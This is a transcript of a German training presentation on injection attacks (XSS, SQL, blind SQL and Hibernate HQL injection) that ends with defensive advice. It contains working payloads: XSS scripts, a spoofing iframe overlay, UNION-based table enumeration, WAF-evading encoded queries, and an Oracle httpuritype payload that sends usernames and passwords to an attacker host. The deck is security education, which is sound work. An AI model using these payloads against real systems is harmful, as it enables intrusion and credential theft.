SecureNet GmbH For personal use only. Distribution not allowed.

Transkript

1 1

2 Die Datenbank als Erfüllungsgehilfe für Datendiebe Eine Kurzeinführung in Injection-Angriffe Stream Security Ralf Reinhardt,

3 Eine Kurzeinführung in Injection-Angriffe Inhalte HTML-Injection Cross-Site Scripting (XSS) Einschub: Data Validation und Data Sanitation SQL-Injection ( klassisch ) Blind SQL-Injection Advanced SQL-Injection ORM-Injection (Hibernate) Ausblick 3

4 Eine Kurzeinführung in Injection-Angriffe Zielpublikum und Ziel des Vortrages Einsteiger in das Thema Web Application Security Was bitte ist Cross-Site Scripting oder SQL-Injection? Warum funktioniert das eigentlich und was läuft hier schief? Entwickler, Architekten, Verantwortliche, Entscheider Erkennen der Gefahren Verstehen der zugrunde liegenden Problematik Sehen der Lösungsmöglichkeiten Wissen um die richtigen Ansatz-Stellen 4

5 Eine Kurzeinführung in Injection-Angriffe Über Ralf Reinhardt Senior Consultant und Projekt Manager seit 2004 bei der SecureNet GmbH, Frankfurter Ring 193a in München Web Application Security, Penetration Testing, Source Code Analyse Beratung, Schulung, Prozesse, Maßnahmen, Guidelines und Policies Mitglied im Open Web Application Security Project (OWASP.org) und Diplom-Informatiker (FH) Bit Homecomputer Ernsthafte Softwareentwicklung 1994 WWW mit Mosaic, Linux 1995 Pentesting auf System- und Netzwerkebene 1996 HTML 1998 JavaScript 2000 Java, MySQL 2003 J2EE, Oracle DBA 5

6 HTML-Injection 6

7 HTML-Injection Willkommen zurück! 7

8 HTML-Injection Willkommen zurück! Source Code im Browser 8

9 HTML-Injection Willkommen zurück! Source Code auf dem Server 9

10 HTML-Injection Anmeldung 10

11 HTML-Injection Anmeldung Source Code 11

12 HTML-Injection Anmeldung Max Mustermann 12

13 HTML-Injection Willkommen zurück! Max Mustermann 13

14 HTML-Injection Willkommen zurück! Max Mustermann 14

15 HTML-Injection Anmeldung Max M<u>stermann 15

16 HTML-Injection Willkommen zurück! Max M<u>stermann 16

17 HTML-Injection Willkommen zurück! Max M<u>stermann 17

18 Cross-Site Scripting (XSS) 18

19 Cross-Site Scripting (XSS) Anmeldung - <script>alert( XSS );</script> 19

20 Cross-Site Scripting (XSS) Willkommen zurück! - <script>alert( XSS );</script> 20

21 Cross-Site Scripting (XSS) Willkommen zurück! - <script>alert( XSS );</script> 21

22 Cross-Site Scripting (XSS) Arten von Cross-Site Scripting Reflektiertes XSS Existiert nur lokal im Browser des Users Angriffs-Vektor: Link oder Persistentes XSS Wird in der Datenbank / dem Repository persistiert Existiert so lange wie die manipulierten Daten in der DB existieren Angriff-Vektor: Manipulierter Gästebuch-Eintrag 22

23 Cross-Site Scripting (XSS) Mögliche Konsequenzen Spoofing Website-Spoofing Frame-Spoofing Link-Spoofing Phishing Reflektiert oder persistent Durchführbar auch mit gültigem Schloss-Symbol (SSL/TLS) Defacement, DoS, usw. Entstellung der Website Denial of Service U. v. a. m. 23

24 Cross-Site Scripting (XSS) Website Spoofing und SSL institucional.bradesco.com.br institucional.bradesco.com.br E<div style="position:absolute;top:0px;width:2000;left:0px;height:2000;backgroundcolor:white"> <iframe src= width=1000 height=800 style=margin-top:0px; margin-left:0px name=tst frameborder=0> </div> 24

25 Einschub: Data Validation und Data Sanitation 25

26 Data Validation und Data Sanitation Kommunkationswege der Daten Client (meist Browser) Application Server Datenbank 26

27 Data Validation und Data Sanitation Kommunkationswege der Daten, Output zu Input vice versa Client (meist Browser) Output / Input Input / Output Application Server Datenbank Output / Input Input / Output 27

28 Data Validation und Data Sanitation Kommunkationswege der Daten, Boundary Filtering Client (meist Browser) B o u n d a r y Output / Input Input / Output Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem 28

29 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Validation Validatoren überprüfen den korrekten Typ einer Variablen, also z.b.: PLZ» 5 stelliger, positiver Integer kleiner als , ggf. mit führenden Nullen adresse Telefonnummer Datum 29

30 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Sanitation Escaping oder Filterung von Meta-Zeichen: HTML-Escaping JavaScript-Escaping SQL-Escaping XPath, LDAP, Betriebsystem-Pfade, usw. Beispiele <, >,,,, ',.,.., :, /, \, &,(, ), [, ], {, }, %, *,?, _, ; +, -, $,!, \n, \r, \t, eof, ESC, U. v. a. m. 30

31 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Sanitation Filterung oder Veränderung von Schlüsselworten (Blacklisting vs. Whitelisting) HTML / JavaScript: alert, script, img, src, onload, onmouseover SQL: select, union, update, delete, insert, drop, create... U. v. a. m. 31

32 Data Validation und Data Sanitation Anmeldung Max M<u>stermann 32

33 Data Validation und Data Sanitation Willkommen zurück! Max M<u>stermann 33

34 Data Validation und Data Sanitation Willkommen zurück! Max M<u>stermann 34

35 Data Validation und Data Sanitation Anmeldung - <script>alert( XSS );</script> 35

36 Data Validation und Data Sanitation Willkommen zurück! - <script>alert( XSS );</script> 36

37 Data Validation und Data Sanitation Willkommen zurück! - <script>alert( XSS );</script> 37

38 Data Validation und Data Sanitation Exploit of a Mom, 38

39 SQL-Injection ( klassisch ) 39

40 SQL-Injection ( klassisch ) Ein Fallbeispiel (1) plz=' 40

41 SQL-Injection ( klassisch ) Ein Fallbeispiel (2) plz=münchen') UNION SELECT ort,ort,plz,ort,ort,ort FROM gaa WHERE ort LIKE 'München' 41

42 SQL-Injection ( klassisch ) Ein Fallbeispiel (3) plz=münchen') UNION SELECT Object_Name, Object_Name, Object_ID, Object_Name, Object_Name, Object_Name FROM USER_TABLES 42

43 SQL-Injection ( klassisch ) Ein Fallbeispiel (4) BANNER_LISTE BANNER_PAGE BANNER_PICS BANNER_VIEW NEWS DYN_KEY FMONATS FMONATS_DYN FMONATS_KEY FMONAT_PICS FONDS_TOP10 GAA PK_DN_ID SEQ_DN_ID SEQ_GAA_ID SQ_BANNERLISTE SQ_FMONATS SQ_PICID SYS_LOB C00003$$ SYS_LOB C00003$$ UQ_FMONAT_PICS UQ_ZINSKEY ZINSEN ZINSEN2 43

44 SQL-Injection ( klassisch ) Eine reguläre Abfrage an die Datenbank Gegeben sei die Tabelle BENUTZER mit den Spalten ANZEIGENAME FIRMA ORT LOGIN PASSWORT 44

45 SQL-Injection ( klassisch ) Konkatenierte Query im Application Server (Schlecht!) 45

46 SQL-Injection ( klassisch ) Eine reguläre Eingabemaske im Browser 46

47 SQL-Injection ( klassisch ) In Java konkatenierte Query (Schlecht!), Ergebnis 47

48 SQL-Injection ( klassisch ) Input durch den Browser 48

49 SQL-Injection ( klassisch ) Schadhafte Nutzlast 1 49

50 SQL-Injection ( klassisch ) Schadhafte Nutzlast 1, Ergebnis 50

51 SQL-Injection ( klassisch ) Schadhafte Nutzlast 2 51

52 SQL-Injection ( klassisch ) Schadhafte Nutzlast 2, Ergebnis 52

53 Blind SQL-Injection 53

54 Blind SQL-Injection Not at all Blind SQL-Injection: SQL-Injection klassisch 54

55 Blind SQL-Injection Totally Blind SQL-Injection 55

56 Blind SQL-Injection Abgrenzung Ausgangslage Das System liefert keine für den Angreifer brauchbaren Fehlermeldungen, mit denen dieser direkt auf die syntaktische Korrektheit seines Angriffsmuster schließen kann Blind SQL-Injection Leicht unterschiedliche, allgemeine Fehlermeldungen Unterschiedliches Verhalten der Anwendung, Seiteneffekte Totally Blind SQL-Injection Die Antwort des Servers ist immer identisch Es kommt gar keine Antwort 56

57 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 57

58 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 58

59 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 59

60 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 60

61 Blind SQL-Injection Erzwingen von Feedback Erzwingen von Fehlern, z.b. ORA Division by zero Auswerten von Laufzeitunterschieden SELECT COUNT(*) FROM dual; (schnell) SELECT COUNT(*) FROM all_objects; (weniger schnell) Nutzung von Seitenkanälen, Out-of-Band Signalisierung utl_http.request() httpuritype 61

62 Blind SQL-Injection Auswerten von Laufzeitunterschieden Prüfung: If Then Else SELECT COUNT(*) FROM dual; (schnell) SELECT COUNT(*) FROM all_objects; (weniger schnell) 62

63 Blind SQL-Injection Out-of-Band Signalisierung Die Oracle Datenbank verschickt einen HTTP-Request an den Angreifer Angreifer hat lesenden Zugriff auf das Webserver-Logfile von box.attacker.tld Angreifer hat lesenden Zugriff auf das DNServer-Logfile von attacker.tld 63

64 Blind SQL-Injection Out-of-Band Signalisierung Mit der Oracle Datenbank nach Hause telefonieren Ziel: Webserver-Logfile box.attacker.tld Ziel: DNServer-Logsfile attacker.tld 64

65 Blind SQL-Injection Out-of-Band Signalisierung, Eingabe der schadhaften Nutzlast 65

66 Blind SQL-Injection Out-of-Band Signalisierung, Schadhafte Nutzlast NN' UNION SELECT httpuritype(' (SELECT login FROM benutzer WHERE ID = 1) ' Password:' (SELECT passwort FROM benutzer WHERE ID = 1)).getContentType(),NULL, NULL FROM dual -- 66

67 Blind SQL-Injection Out-of-Band Signalisierung, zusammengesetzte Query 67

68 Blind SQL-Injection Out-of-Band Signalisierung, Ergebnis Im Logfiles des Web-Servers landen: Benutzername Passwort Bei einem Direktgespräch ggf. die IP-Adresse der Datenbank 68

69 Advanced SQL-Injection 69

70 Advanced SQL-Injection Abgrenzung Advanced SQL-Injection Ist nicht eindeutig zu definiert Immer dann, wenn es ein wenig anspruchsvoller wird Beispiele Shell-Injection Aufruf von Betriebssystem-Kommandos U. v. a. m Im Rahmen dieses Vortrages Umgehung des Boundary-Filterings Bedingt durch fehlerhafte Validatoren und/oder mangelnde Sanitation und/oder fehlerhaft konfigurierte Web Application Firewall (WAF) 70

71 Advanced SQL-Injection Vielgestaltigkeit von SQL-Statements SELECT 'Test!', COUNT(*) FROM dual; 71

72 Advanced SQL-Injection Übergabe einer Variablen an den Server 72

73 Advanced SQL-Injection Blick in den Source Code eines Formulars 73

74 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (URL 1) somevalue=nn%27+union+select+%27test!%2 7%2C+COUNT(*)+FROM+dual-- 74

75 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (URL 2) somevalue=nn'%20union%20select%20concat (/*%20%20egal%09*/coNCat(%09%09'T'%09,% 20%20chr%20%20(%20%20AsciI%20(%20'e'%20 )%20)%20),concAT(cHR(10%20*% )/**/,chr(116))%20)%20%20%20%20%20%20 %7C%7Cchr(LEAST(33,101,1235,8272)),COUN T(chr(42))%20FROM%20dual%

76 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (Hex) somevalue=%4e%4e%27%20%55%4e%49%4f%4e%2 0%53%45%4C%45%43%54%20%27%54%65%73%74%2 1%27%2C%20%43%4F%55%4E%54%28%2A%29%20%4 6%52%4F%4D%20%64%75%61%6C%2D%2D 76

77 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (Unicode) somevalue=%u004e%u004e%u0027%u0020%u005 5%u004E%u0049%u004F%u004E%u0020%u0053%u 0045%u004C%u0045%u0043%u0054%u0020%u002 7%u0054%u0065%u0073%u0074%u0021%u0027%u 002C%u0020%u0043%u004F%u0055%u004E%u005 4%u0028%u002A%u0029%u0020%u0046%u0052%u 004F%u004D%u0020%u0064%u0075%u0061%u006 C%u002D%u002D 77

78 ORM-Injection (Hibernate) 78

79 ORM-Injection (Hibernate) Object-Relational Mapping, über Hibernate Bekannter O/R-Mapper für Java, Abfrage-Möglichkeiten: Natives SQL Hibernate Query Language (HQL) Criteria Hibernate Query Language (HQL) Die Syntax ist an SQL angelehnt Der Funktionsumfang entspricht nur einer Teilmenge von SQL Es werden nicht Tabellen und Spalten referenziert, sondern Objekte und deren Attribute Der UNION-Operator wird nicht unterstützt 79

80 ORM-Injection (Hibernate) Ein Beispiel aus der Praxis Gegeben sei die Tabelle BENUTZER mit den Spalten LOGIN (der Login-Name, z.b. admin ) PASSWORT (das zugehörige Passwort, z.b. nim23da ) Gegeben sei die Klasse User.java mit den Attributen userloginname (der Login-Name, z.b. admin ) userpasswort (das zugehörige Passwort, z.b. nim23da ) Gegeben sei das Mapping LOGIN userloginname PASSWORT userpasswort 80

81 ORM-Injection (Hibernate) Ein Beispiel aus der Praxis Es existiert eine Funktion, die es dem Benutzer ermöglicht, seinen Login-Namen zu ändern Vor dem eigentlichen Update schaut die Anwendung nach, ob es einen Benutzer mit diesem Login-Namen bereits gibt Gibt es den gewünschten Login-Namen bereits, so wird die Aktion abgebrochen und der Benutzer erhält die Fehlermeldung Loginname existiert bereits! 81

82 ORM-Injection (Hibernate) Die Suche nach existierenden Login-Namen Feststellungen: Die Anfrage ist in HQL geschrieben und entspricht etwa einem effizienten select count(*) from... suserloginname ist der Input kommend vom Browsers des Users Das Objekt u ist eine Instanz der Klasse User Ist lcount größer als Null, so ist der Loginname bereits vergeben (und die Fehlermeldung Loginname existiert bereits! erscheint) Durch die Konkatenation existiert eine Injection-Schwachstelle 82

83 ORM-Injection (Hibernate) Enumeration von Benutzern Loginname existiert bereits! 83

84 ORM-Injection (Hibernate) Ein kurzer Test mit UNION Loginname existiert bereits! 84

85 ORM-Injection (Hibernate) Passwort-Enumeration (1) 85

86 ORM-Injection (Hibernate) Passwort-Enumeration (1), HQL-Statement SELECT COUNT(u) FROM User u WHERE u.userloginname = admin' and u.userpassword like '%' union 86

87 ORM-Injection (Hibernate) Passwort-Enumeration (1) Loginname existiert bereits! 87

88 ORM-Injection (Hibernate) Passwort-Enumeration (2) Loginname existiert bereits! 88

89 ORM-Injection (Hibernate) Passwort-Enumeration (3) Loginname existiert bereits! 89

90 ORM-Injection (Hibernate) Passwort-Enumeration (4) Loginname existiert bereits! 90

91 Generelle Injection-Problematik Quintessenz Keine zusammengesetzte Queries! Keine Dynamik! Umgehung des SQL-Interpreters, z.b. durch ausschließliche Verwendung gebundener Parameter in Prepared Statements (keine Stored Procedures!) Korrekt verwendete O/R-Mapper Wirksames Boundary Filtering! All Input is Evil! Input / Output Validation Input / Output Sanitation Dies betrifft nicht nur SQL! LDAP-Injection XPath-Injection U. v. a. m. 91

92 Ausblick 92

93 Ausblick Rückblick Boundary Filtering Client (meist Browser) B o u n d a r y Output / Input Input / Output Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem 93

94 Ausblick Maßnahmen bei Systemen in Wartung Vulnerability-Assessment ( Max M<u>stermann ) Web Application Security Penetration Test Code Review (und Fixing!) Source Code Analyse (und Fixing!) Awareness-Maßnahmen, Schulungen, Workshops Secure Coding Guidelines / Policies Secure Software Development Lifecycle / Prozesse 94

95 Ausblick Maßnamen bei Legacy-Systemen: Web Application Firewalls Client (meist Browser) B o u n d a r y Output / Input Input / Output WAF Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem WAF WAF 95

96 Vielen Dank! Fragen? Anregungen? SecureNet GmbH Frankfurter Ring 193a D München +49 (0)89 / Ralf Reinhardt ralf.reinhardt@securenet.de Web Application Security Penetration Testing, Source Code Analyse, Maßnahmen-Beratung Softwareentwicklung Entwicklung sicherer Webanwendungen 96

97 97